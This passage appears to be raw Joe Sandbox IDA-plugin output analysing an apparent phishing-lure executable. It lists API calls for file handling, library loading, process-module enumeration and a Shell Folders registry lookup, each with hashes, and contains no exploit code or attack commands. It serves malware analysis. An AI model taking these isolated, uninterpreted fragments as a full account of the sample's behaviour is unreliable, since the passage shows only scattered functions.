                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID:
                                                              • API String ID: 2221118986-0
                                                              • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                              • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                              APIs
                                                              • memset.MSVCRT ref: 004301AD
                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID:
                                                              • API String ID: 1297977491-0
                                                              • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                              • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free
                                                              • String ID:
                                                              • API String ID: 1294909896-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              Memory Dump Source
